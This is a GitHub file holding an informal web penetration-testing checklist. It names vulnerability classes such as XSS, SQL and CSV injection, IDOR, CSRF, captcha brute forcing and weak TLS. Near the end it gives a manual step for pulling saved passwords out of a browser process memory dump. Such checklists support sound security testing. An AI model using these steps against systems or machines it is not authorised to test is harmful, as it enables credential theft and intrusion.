-
Notifications
You must be signed in to change notification settings - Fork 0
/
Webchecklist.txt
62 lines (61 loc) · 1.78 KB
/
Webchecklist.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
Web Checklist
Content-Type- Charset-utf=6,7,8,9
user-agent- injection attacks
HTTP Methods
Host injection - origin
Redirection - 302 error request/response
robots.txt
sitemap.xml
rate limit attack
input not sanitized
input validation
URL mai injection- htlm, xss, sql
security headers CSP, HSTS, X-frame options, x-xss protection, X content type
error handling
Information disclosure
using vulnerable components
buffer overflow
clickjacking
cookie manupulation
cookie flags
auto complete
Response manupulation
session timeout
back button refresh
captcha bypass (bruteforce)
SSL and TLS weak ciphers
Obsolete TLS Enabled
directory bruteforcing / listing
about:cache --firefox browser
concurrent sessions
CORS
CSRF
CSV Injection
malicious File upload
Application uses cleartext traffic
Business Logic Bypass
Captcha not implemented
Captcha expiration or same captcha is used
website on HTTP
Default server page visible
Duplicate HTTP headers
HTTPS is not implemented
IDOR
Insecure permission
Internal path disclosure
Last logon date and time not displayed --Finance sites
Misconfigured CSP header
Misconfigured security headers
OTP Flooding
Password in Cleartext in Browser settings
Password return in response
Private IP addresses disclosed
URL is accessible without authentication
Rate limiting not implemented
sensitive port open
website accessible through IP
Cookie attribute not set
Misconfigured CSP Header -- unsafe-inline, unsafe-eval(Potential to DOM XSS)
Password in Cleartext in Browser settings
(Go to browser setting, saved passwords and check if password is visible in cleartext) (Task manager, right click and dump, open the file in hex workflow, search for the password in dump file)
Weak encoding enabled